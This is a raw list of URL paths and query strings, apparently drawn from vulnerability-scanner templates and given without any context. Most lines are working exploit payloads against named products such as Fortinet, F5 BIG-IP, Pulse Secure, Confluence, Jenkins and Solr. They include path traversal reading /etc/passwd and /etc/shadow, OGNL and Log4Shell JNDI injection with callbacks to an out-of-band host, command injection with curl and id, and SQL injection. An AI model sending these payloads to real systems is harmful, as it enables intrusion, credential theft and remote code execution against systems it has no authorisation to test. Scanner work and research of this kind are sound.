/cgi-bin/status
/cgi-bin/stats
/cgi-bin/test
/cgi-bin/status/status.cgi
/test.cgi
/debug.cgi
/cgi-bin/test-cgi
/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}
/integration/saveGangster.action
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=
/vpn/../vpns/cfg/smb.conf
/cgi-bin/file_transfer.cgi
/api/timelion/run
/web.config.i18n.ashx?l={{string}}&v={{string}}
/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}
/api/experimental/latest_runs
/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(
/run
/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D
/console/login/LoginForm.jsp
/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/hsqldb%0a
/cgi-bin/weblogin.cgi?username=admin
/ui/vropspluginui/rest/services/getstatus
/users/sign_in
/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;
/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/openam/oauth2/..;/ccversion/Version
/oam/server/opensso/sessionservice
/?unix:{{repeat(
/RestAPI/ImportTechnicians
/ddns_check.ccp
/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\
/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d
/zabbix/index_sso.php
/index_sso.php
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/
/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php.
/js/zimbraMail/share/model/ZmSettings.js
/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0
/mifs/aad/api/v2/admins/users
/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost
/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
/secure/ContactAdministrators!default.jspa
/web.config.i18n.ashx?l=nuclei&v=nuclei
/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei
/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E
/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
/user/error
/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D
/cgi-bin/masterCGI?ping=nomip&user=;id;
{{paths}}
/_layouts/15/download.aspx
/sdwan/nitro/v1/config/get_package_file?action=file_download
/example/vulnerable/path
/include/api_functions.php
/path/to/vulnerable/endpoint
/RPC2_Login
/api/v3/request
/api/v3/requests
/vpn/index.html
/exploit
/vulnerable_endpoint
/some_vulnerable_path
/cgi-bin/config.exp
/vulnerability-check
/research-center?search=<script>alert(
/resource-center?search=<script>alert(
/mifs/asfV3/api/v2/admins/users
/SetupWizard.aspx/{{string}}
/test_private_CVE
/hax?jsp=/app/rest/server;.jsp
/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}
/client/index.php%3F.php/gsb/users.php
/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D
/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost
/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}
/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D
/public/{{randstr}}.jsp
/vulnerable/path
/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css
/?search==%00{.exec|cmd.exe+/c+ping+127.0.0.1+-n+10.}
/access/set?param=enableapi&value=1
/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
/OS/startup/restore/restoreAdmin.php
/tmp/temp.db%3f.1.1.1.1a-1.css
/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css
?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+md5({{num}}))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0
/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(md5({{num}})))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0
/installer/index.php
/roundcube/installer/index.php
/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27
/{{interface}}
/app/login?
/api/v1/serverinfo
/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d
/geoserver/wfs?service=WFS&request=GetCapabilities
/geoserver/ows?service=WFS&request=GetCapabilities
/wfs?service=WFS&request=GetCapabilities
/ows?service=WFS&request=GetCapabilities
/geoserver/wfs?service=WFS
/geoserver/ows?service=WFS
/wfs?service=WFS
/ows?service=WFS
/remote/login
/login
/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x
/dana-na/auth/url_default/welcome.cgi
/login.html
/goanywhere/license/Unlicensed.xhtml/{{string}}?javax.faces.ViewState={{string}}&GARequestAction=activate
/license/Unlicensed.xhtml/{{string}}?javax.faces.ViewState={{string}}&GARequestAction=activate
/dana-na/auth/url_6/welcome.cgi
/dana/home/index.cgi
/albatross/saml/idpSelection?id={{randstr}}&userName=admin
